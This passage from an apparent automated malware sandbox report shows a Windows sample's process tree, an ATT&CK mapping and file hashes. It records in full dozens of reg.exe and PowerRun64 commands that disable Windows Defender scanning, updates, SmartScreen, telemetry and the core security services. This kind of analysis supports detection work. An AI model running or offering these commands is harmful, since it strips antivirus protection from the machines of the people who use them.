  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableArchiveScanning" /t reg_DWORD /d "1" /f
  2⤵
  PID:2844
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableCatchupFullScan" /t reg_DWORD /d "1" /f
  2⤵
  PID:2796
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableCatchupQuickScan" /t reg_DWORD /d "1" /f
  2⤵
  PID:2180
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableRemovableDriveScanning" /t reg_DWORD /d "1" /f
  2⤵
  PID:2940
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableRestorePoint" /t reg_DWORD /d "1" /f
  2⤵
  PID:2944
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableScanningMappedNetworkDrivesForFullScan" /t reg_DWORD /d "1" /f
  2⤵
  PID:2696
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableScanningNetworkFiles" /t reg_DWORD /d "1" /f
  2⤵
  PID:2552
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "PurgeItemsAfterDelay" /t reg_DWORD /d 0 /f
  2⤵
  PID:2856
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScheduleDay" /t reg_DWORD /d 8 /f
  2⤵
  PID:2308
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScheduleTime" /t reg_DWORD /d 0 /f
  2⤵
  PID:3000
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScanOnlyIfIdle" /t reg_DWORD /d 0 /f
  2⤵
  PID:2892
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScanParameters" /t reg_DWORD /d 0 /f
  2⤵
  PID:2716
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" /v "FirstAuGracePeriod" /t reg_DWORD /d "0" /f
  2⤵
  PID:2712
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "DisableUpdateOnStartupWithoutEngine" /t reg_DWORD /d 1 /f
  2⤵
  PID:2884
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "ScheduleDay" /t reg_DWORD /d 8 /f
  2⤵
  PID:2836
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "ScheduleTime" /t reg_DWORD /d 0 /f
  2⤵
  PID:2736
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "SignatureUpdateCatchupInterval" /t reg_DWORD /d 0 /f
  2⤵
  PID:2996
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControl" /t reg_SZ /d "Anywhere" /f
  2⤵
  PID:1996
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControlEnabled" /t REG_DWORD /d 1 /f
  2⤵
  PID:2688
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t reg_DWORD /d "1" /f
  2⤵
  PID:2684
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t reg_DWORD /d "0" /f
  2⤵
  PID:2704
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReportingLocation" /t reg_MULTI_SZ /d "0" /f
  2⤵
  PID:2720
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t reg_DWORD /d "2" /f
  2⤵
  PID:2756
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "LocalSettingOverrideSpynetReporting" /t reg_DWORD /d 0 /f
  2⤵
  PID:2768
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Systray" /v "HideSystray" /t reg_DWORD /d "1" /f
  2⤵
  PID:2540
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t reg_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender notification settings
  PID:2356
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t reg_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender notification settings
  PID:2432
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /t reg_BINARY /d "030000000000000000000000" /f
  2⤵
  PID:932
- C:\Users\Admin\AppData\Local\Temp\$_39_\PowerRun64.exe
  PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2316
- - C:\Users\Admin\AppData\Local\Temp\$_39_\PowerRun64.exe
    "C:\Users\Admin\AppData\Local\Temp\$_39_\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:316
  - - C:\Users\Admin\AppData\Local\Temp\$_39_\PowerRun64.exe
      "C:\Users\Admin\AppData\Local\Temp\$_39_\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:1768
    - - C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        
        PID:2068
- C:\Users\Admin\AppData\Local\Temp\$_39_\PowerRun64.exe
  PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1484
- - C:\Users\Admin\AppData\Local\Temp\$_39_\PowerRun64.exe
    "C:\Users\Admin\AppData\Local\Temp\$_39_\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1524
  - - C:\Users\Admin\AppData\Local\Temp\$_39_\PowerRun64.exe
      "C:\Users\Admin\AppData\Local\Temp\$_39_\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:2488
    - - C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        Modifies Security services
        
        PID:292
- C:\Users\Admin\AppData\Local\Temp\$_39_\PowerRun64.exe
  PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2020
- - C:\Users\Admin\AppData\Local\Temp\$_39_\PowerRun64.exe
    "C:\Users\Admin\AppData\Local\Temp\$_39_\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1948
  - - C:\Users\Admin\AppData\Local\Temp\$_39_\PowerRun64.exe
      "C:\Users\Admin\AppData\Local\Temp\$_39_\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:2728
    - - C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        Modifies Security services
        
        PID:1480
- C:\Users\Admin\AppData\Local\Temp\$_39_\PowerRun64.exe
  PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2916
- - C:\Users\Admin\AppData\Local\Temp\$_39_\PowerRun64.exe
    "C:\Users\Admin\AppData\Local\Temp\$_39_\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2280
  - - C:\Users\Admin\AppData\Local\Temp\$_39_\PowerRun64.exe
      "C:\Users\Admin\AppData\Local\Temp\$_39_\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:1284
    - - C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        Modifies Security services
        
        PID:2576
- C:\Users\Admin\AppData\Local\Temp\$_39_\PowerRun64.exe
  PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2464
- - C:\Users\Admin\AppData\Local\Temp\$_39_\PowerRun64.exe
    "C:\Users\Admin\AppData\Local\Temp\$_39_\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1036
  - - C:\Users\Admin\AppData\Local\Temp\$_39_\PowerRun64.exe
      "C:\Users\Admin\AppData\Local\Temp\$_39_\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:2444
    - - C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        Modifies Security services
        
        PID:1496
- C:\Users\Admin\AppData\Local\Temp\$_39_\PowerRun64.exe
  PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1268
- - C:\Users\Admin\AppData\Local\Temp\$_39_\PowerRun64.exe
    "C:\Users\Admin\AppData\Local\Temp\$_39_\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2628
  - - C:\Users\Admin\AppData\Local\Temp\$_39_\PowerRun64.exe
      "C:\Users\Admin\AppData\Local\Temp\$_39_\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:3064
    - - C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        Modifies security service
        
        PID:2300
- C:\Users\Admin\AppData\Local\Temp\$_39_\PowerRun64.exe
  PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2052
- - C:\Users\Admin\AppData\Local\Temp\$_39_\PowerRun64.exe
    "C:\Users\Admin\AppData\Local\Temp\$_39_\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2876
  - - C:\Users\Admin\AppData\Local\Temp\$_39_\PowerRun64.exe
      "C:\Users\Admin\AppData\Local\Temp\$_39_\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:1244
    - - C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        Modifies security service
        
        PID:1592
- C:\Users\Admin\AppData\Local\Temp\$_39_\PowerRun64.exe
  PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3056
- - C:\Users\Admin\AppData\Local\Temp\$_39_\PowerRun64.exe
    "C:\Users\Admin\AppData\Local\Temp\$_39_\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2216
  - - C:\Users\Admin\AppData\Local\Temp\$_39_\PowerRun64.exe
      "C:\Users\Admin\AppData\Local\Temp\$_39_\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:2540
    - - C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        Modifies Security services
        
        PID:2752
- C:\Users\Admin\AppData\Local\Temp\$_39_\PowerRun64.exe
  PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2968
- - C:\Users\Admin\AppData\Local\Temp\$_39_\PowerRun64.exe
    "C:\Users\Admin\AppData\Local\Temp\$_39_\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2716
  - - C:\Users\Admin\AppData\Local\Temp\$_39_\PowerRun64.exe
      "C:\Users\Admin\AppData\Local\Temp\$_39_\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:1864
    - - C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        
        PID:1708
- C:\Users\Admin\AppData\Local\Temp\$_39_\PowerRun64.exe
  PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2420
- - C:\Users\Admin\AppData\Local\Temp\$_39_\PowerRun64.exe
    "C:\Users\Admin\AppData\Local\Temp\$_39_\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2432
  - - C:\Users\Admin\AppData\Local\Temp\$_39_\PowerRun64.exe
      "C:\Users\Admin\AppData\Local\Temp\$_39_\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:1384
    - - C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        Modifies Security services
        
        PID:848
- C:\Users\Admin\AppData\Local\Temp\$_39_\PowerRun64.exe
  PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2352
- - C:\Users\Admin\AppData\Local\Temp\$_39_\PowerRun64.exe
    "C:\Users\Admin\AppData\Local\Temp\$_39_\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:1136
  - - C:\Users\Admin\AppData\Local\Temp\$_39_\PowerRun64.exe
      "C:\Users\Admin\AppData\Local\Temp\$_39_\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:2280
    - - C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        Modifies Security services
        
        PID:2516
- C:\Users\Admin\AppData\Local\Temp\$_39_\PowerRun64.exe
  PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2272
- - C:\Users\Admin\AppData\Local\Temp\$_39_\PowerRun64.exe
    "C:\Users\Admin\AppData\Local\Temp\$_39_\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:1336
  - - C:\Users\Admin\AppData\Local\Temp\$_39_\PowerRun64.exe
      "C:\Users\Admin\AppData\Local\Temp\$_39_\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:1492
    - - C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        Modifies Security services
        
        PID:2856
- C:\Users\Admin\AppData\Local\Temp\$_39_\PowerRun64.exe
  PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2276
- - C:\Users\Admin\AppData\Local\Temp\$_39_\PowerRun64.exe
    "C:\Users\Admin\AppData\Local\Temp\$_39_\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:1564
  - - C:\Users\Admin\AppData\Local\Temp\$_39_\PowerRun64.exe
      "C:\Users\Admin\AppData\Local\Temp\$_39_\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:2628
    - - C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        Modifies Security services
        
        PID:2980
- C:\Users\Admin\AppData\Local\Temp\$_39_\PowerRun64.exe
  PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2652
- - C:\Users\Admin\AppData\Local\Temp\$_39_\PowerRun64.exe
    "C:\Users\Admin\AppData\Local\Temp\$_39_\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2172
  - - C:\Users\Admin\AppData\Local\Temp\$_39_\PowerRun64.exe
      "C:\Users\Admin\AppData\Local\Temp\$_39_\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:1716
    - - C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        Modifies security service
        
        PID:2468
- C:\Users\Admin\AppData\Local\Temp\$_39_\PowerRun64.exe
  PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1760
- - C:\Users\Admin\AppData\Local\Temp\$_39_\PowerRun64.exe
    "C:\Users\Admin\AppData\Local\Temp\$_39_\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2972
  - - C:\Users\Admin\AppData\Local\Temp\$_39_\PowerRun64.exe
      "C:\Users\Admin\AppData\Local\Temp\$_39_\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:1400
    - - C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        Modifies security service
        
        PID:1624
- C:\Users\Admin\AppData\Local\Temp\$_39_\PowerRun64.exe
  PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3000
- - C:\Users\Admin\AppData\Local\Temp\$_39_\PowerRun64.exe
    "C:\Users\Admin\AppData\Local\Temp\$_39_\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2700
  - - C:\Users\Admin\AppData\Local\Temp\$_39_\PowerRun64.exe
      "C:\Users\Admin\AppData\Local\Temp\$_39_\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:1976
    - - C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        Modifies Security services
        
        PID:1672
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell -Command "Get-MpPreference"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:2704
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell -Command "$wshell=New-Object -ComObject wscript.shell; $wshell.SendKeys('^a')
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:1256
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell -Command "$wshell=New-Object -ComObject wscript.shell; $wshell.SendKeys('^c')
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:2432

C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20241108023855.log C:\Windows\Logs\CBS\CbsPersist_20241108023855.cab
1⤵
- Drops file in Windows directory
PID:3020

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\autB73E.tmp

Filesize
25KB

MD5
436c1bb98deeccecb73fad945f1dd3dc

SHA1
774313ba911945589971bbc73498d81f060dabe6

SHA256
05eae1691149cc66e458d5e5b4430bd3b938b278b8bdb2c887a13c9871004c51

SHA512
66ea41b9b4a42f7c40d1ce5b6e82a6f03e8489648b912d96a81efa13d340d4d651078df7c1302c595ca83408e7208d1d79f02165dc27383952a9abe7f851c3e2

Download Submit
C:\Users\Admin\AppData\Local\Temp\enbqpdf

Filesize
81KB

MD5
940b1915cadee0e2b33d80799816f6c7

SHA1
2c10e4fec3e8c054055d1ed78757117575f273f2

SHA256
81e89e7266cfe5158e44f5578c8be61353e781daebdd47a33597e9ec503d379c

SHA512
cc3c574fd5392c1b54146b591e22b1c01c95e34a602c403ad96c49b7ee6ad31d1478a00cc1334286addc5cb94496372a172745e9ad20554023e1e22c7da1e1c5

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
93348ca37012fd3256a950ff10e73916

SHA1
534531d47c9a2767a51f7f862c17cbe66395474f

SHA256
08812688f2fd2ca8ddbb40361391ea59e754c6bb23481f93249b365f2786f03f

SHA512
